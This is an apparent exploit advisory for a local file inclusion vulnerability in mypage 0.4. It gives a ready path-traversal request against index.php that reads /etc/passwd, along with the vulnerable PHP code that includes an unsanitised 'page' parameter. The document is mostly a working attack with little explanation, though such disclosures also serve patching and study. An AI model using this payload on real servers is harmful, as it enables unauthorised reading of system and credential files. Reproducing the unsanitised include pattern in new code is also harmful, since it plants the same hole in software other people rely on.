29 lines
553 B
Text
Executable file
29 lines
553 B
Text
Executable file
#############################################################
|
|
# mypage0.4 LFI Vulnerability
|
|
|
|
# Author: BAYBORA
|
|
|
|
# Site: www.1923turk.biz<http://www.1923turk.biz>
|
|
|
|
##############################################################
|
|
|
|
# Exploit:
|
|
|
|
|
|
Vuln file: index.php?page=LFI
|
|
|
|
|
|
Exploit:
|
|
|
|
|
|
POST http://server/index.php?page=../../../../../../../../etc/passwd
|
|
|
|
index.php
|
|
|
|
if(isset($_GET['page'])){
|
|
...
|
|
$inhalt=$inhaltsordner."/".$_GET['page'];}
|
|
...
|
|
$inhalt=str_replace("///","",$inhalt);
|
|
if (FALSE==include$inhalt){echo$notfound;}
|
|
|